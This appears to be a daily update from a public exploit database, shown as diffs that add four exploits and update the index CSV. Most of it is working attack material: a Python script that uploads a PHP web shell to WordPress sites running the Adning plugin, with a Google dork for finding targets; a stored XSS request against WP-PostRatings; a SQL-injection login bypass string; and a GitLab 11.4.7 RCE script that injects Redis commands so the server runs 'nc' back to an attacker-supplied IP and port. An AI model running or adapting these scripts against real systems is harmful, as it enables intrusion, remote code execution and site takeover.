DB: 2020-12-25

4 changes to exploits/shellcodes

Apartment Visitors Management System 1.0 - Authentication Bypass
WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload
WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting
GitLab 11.4.7 - RCE (Authenticated)

exploits/php/webapps/49332.txt

@@ -0,0 +1,73 @@
+# Exploit Title: WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload
+# Google Dork: inurl:/wp-content/plugins/angwp
+# Date: 23/12/2020
+# Exploit Author: spacehen
+# Vendor Homepage: http://adning.com/
+# Version: <1.5.6
+# Tested on: Ubuntu 20.04.1 LTS (x86)
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+	print("Adning Advertising < 1.5.6 - Arbitrary File Upload")
+	print("Author -> space_hen (www.lunar.sh)")
+
+def print_usage():
+	print("Usage: python3 exploit.py [target url] [php file]")
+	print("Ex: python3 exploit.py https://example.com ./shell.php")
+
+def vuln_check(uri):
+	response = requests.get(uri)
+	raw = response.text
+
+	if ("no files found" in raw):
+		return True;
+	else:
+		return False;
+
+def main():
+
+	print_banner()
+	if(len(sys.argv) != 3):
+		print_usage();
+		sys.exit(1);
+
+	base = sys.argv[1]
+	file_path = sys.argv[2]
+
+	ajax_action = '_ning_upload_image'
+	admin = '/wp-admin/admin-ajax.php';
+
+	uri = base + admin + '?action=' + ajax_action ;
+	check = vuln_check(uri);
+
+	if(check == False):
+		print("(*) Target not vulnerable!");
+		sys.exit(1)
+
+	if( path.isfile(file_path) == False):
+		print("(*) Invalid file!")
+		sys.exit(1)
+
+	files = {'files[]' : open(file_path)}
+	data = {
+	"allowed_file_types" : "php,jpg,jpeg",
+	"upload" : json.dumps({"dir" : "../"})
+	}
+	print("Uploading Shell...");
+	response = requests.post(uri, files=files, data=data )
+	file_name = path.basename(file_path)
+	if(file_name in response.text):
+		print("Shell Uploaded!")
+		if(base[-1] != '/'):
+			base += '/'
+		print(base + file_name)
+	else:
+		print("Shell Upload Failed")
+		sys.exit(1)
+
+main();

exploits/php/webapps/49333.txt

@@ -0,0 +1,41 @@
+# Exploit Title: WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting
+# Date: 20-12-2018
+# Software Link: https://wordpress.org/plugins/wp-postratings/
+# Exploit Author: Park Won Seok
+# Version: wp-postratings.1.86
+# Tested on: Windows 10 x64
+
+# description:
+# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins wp-postratings.1.86
+# One parameters(postratings_image) have Cross-Site Scripting.
+
+# POC
+# XSS Stored
+
+POST
+http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings/postratings-options.php
+ HTTP/1.1
+Host: localhost
+Content-Length: 1765
+Cache-Control: max-age=0
+Origin: localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer:
+http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings%2Fpostratings-options.php
+Accept-Encoding: gzip, deflate
+Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie:
+wordpress_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cff47715fb398e65023b74d3aad0d0429061e90422614399cf1cffb88df424173;
+wp-settings-1=deleted; wp-settings-time-1=1545201993;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cd63f851c891cd0792c2c7e5a2d62342ffb57501777f1e8f0e9c13b8ff0daacc2
+Connection: close
+
+_wpnonce=b841885588&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-postratings%2Fpostratings-options.php&postratings_customrating=0&postratings_template_vote=%25RATINGS_IMAGES_VOTE%25+%28%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_text=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%2C+%3Cstrong%3Erated%3C%2Fstrong%3E%3C%2Fem%3E%29&postratings_template_permission=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%3C%2Fem%3E%29%3Cbr+%2F%3E%3Cem%3EYou+need+to+be+a+registered+member+to+rate+this.%3C%2Fem%3E&postratings_template_none=%25RATINGS_IMAGES_VOTE%25+%28No+Ratings+Yet%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_highestrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22+title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+%25RATINGS_IMAGES%25+%28%25RATINGS_AVERAGE%25+out+of+%25RATINGS_MAX%25%29%3C%2Fli%3E&postratings_template_mostrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22++title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+-+%25RATINGS_USERS%25+votes%3C%2Fli%3E&
+[postratings_image=stars\"onerror=alert(1)
+--]&postratings_max=2&postratings_richsnippet=0&postratings_ratingstext%5B%5D=1+Star&postratings_ratingsvalue%5B%5D=%2B1&postratings_ratingstext%5B%5D=&postratings_ratingsvalue%5B%5D=0&postratings_ajax_style_loading=1&postratings_ajax_style_fading=1&postratings_allowtorate=2&postratings_logging_method=3&Submit=Save+Changes

exploits/php/webapps/49335.txt

@@ -0,0 +1,14 @@
+# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass
+# Date: 2020-12-24 
+# Exploit Author:  Kshitiz Raj(manitorpotterk)
+# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
+# Version: V1.0 
+# Tested on: Windows 10/Kali Linux
+
+Step 1 -  Go to url http://localhost/avms/index.php
+<http://localhost/avms/index.php>*
+
+Step 2 – Enter Username :-   ' or '1'='1'# *
+
+Step 3 -  Enter Password - anything*

exploits/ruby/webapps/49334.py

@@ -0,0 +1,101 @@
+# Exploit Title: GitLab 11.4.7 - RCE (Authenticated)
+# Date: 24th December 2020
+# Exploit Author: Sam Redmond
+# Software Link: https://gitlab.com/
+# Environment: GitLab 11.4.7, community edition
+# CVE: CVE-2018-19571 + CVE-2018-19585
+# Version: 11.4.7
+
+#!/usr/bin/python3
+
+import requests
+from bs4 import BeautifulSoup
+import argparse
+import random
+
+
+parser = argparse.ArgumentParser(description='GitLab 11.4.7 RCE')
+parser.add_argument('-u', help='GitLab Username/Email', required=True)
+parser.add_argument('-p', help='Gitlab Password', required=True)
+parser.add_argument('-g', help='Gitlab URL (without port)', required=True)
+parser.add_argument('-l', help='reverse shell ip', required=True)
+parser.add_argument('-P', help='reverse shell port', required=True)
+args = parser.parse_args()
+
+username = args.u
+password = args.p
+gitlab_url = args.g + ":5080"
+local_ip = args.l
+local_port = args.p
+
+session = requests.Session()
+
+# Get Authentication Token
+r = session.get(gitlab_url + "/users/sign_in")
+soup = BeautifulSoup(r.text, features="lxml")
+token = soup.findAll('meta')[16].get("content")
+print(f"[+] authenticity_token: {token}")
+
+login_form = {
+    "authenticity_token": token,
+    "user[login]": username,
+    "user[password]": password,
+    "user[remember_me]": "0"
+}
+r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
+
+if r.status_code != 200:
+    exit(f"Login Failed:{r.text}")
+
+# Create project
+import_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2F.git"
+project_name = f'project{random.randrange(1, 10000)}'
+project_url = f'{gitlab_url}/{username}'
+
+print(f"[+] Creating project with random name: {project_name}")
+
+form = """\nmulti
+    sadd resque:gitlab:queues system_hook_push
+    lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
+    exec
+    exec
+    exec\n"""
+
+r = session.get(f"{gitlab_url}/projects/new")
+soup = BeautifulSoup(r.text, features="lxml")
+
+namespace_id = soup.find(
+    'input', {'name': 'project[namespace_id]'}).get('value')
+
+project_token = soup.findAll('meta')[16].get("content")
+project_token = project_token.replace("==", "%3D%3D")
+project_token = project_token.replace("+", "%2B")
+
+payload = f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bimport_url%5D={import_url}{form}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bnamespace_id%5D={namespace_id}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"
+
+cookies = {
+    'sidebar_collapsed': 'false',
+    'event_filter': 'all',
+    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+    '_gitlab_session': session.cookies['_gitlab_session'],
+}
+
+headers = {
+    'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+    'Accept-Language': 'en-US,en;q=0.5',
+    'Accept-Encoding': 'gzip, deflate',
+    'Referer': f'{gitlab_url}/projects',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Content-Length': '398',
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1',
+}
+
+print("[+] Running Exploit")
+r = session.post(
+    gitlab_url+'/projects', data=payload, cookies=cookies, headers=headers, verify=False)
+if "The change you requested was rejected." in r.text:
+    exit('Exploit failed, check input params')
+
+print('[+] Exploit completed successfully!')

files_exploits.csv

@@ -43529,6 +43529,7 @@ id,file,description,date,author,type,platform,port
 49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
 49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
 49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
+49335,exploits/php/webapps/49335.txt,"Apartment Visitors Management System 1.0 - Authentication Bypass",2020-12-24,"Kshitiz Raj",webapps,php,
 49316,exploits/php/webapps/49316.txt,"Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
 49317,exploits/php/webapps/49317.rb,"WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-22,"SunCSR Team",webapps,php,
 49318,exploits/linux/webapps/49318.rb,"Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)",2020-12-22,AkkuS,webapps,linux,
@@ -43543,3 +43544,6 @@ id,file,description,date,author,type,platform,port
 49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,
 49330,exploits/linux/webapps/49330.rb,"TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution (Metasploit)",2020-12-23,AkkuS,webapps,linux,
 49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
+49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
+49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
+49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,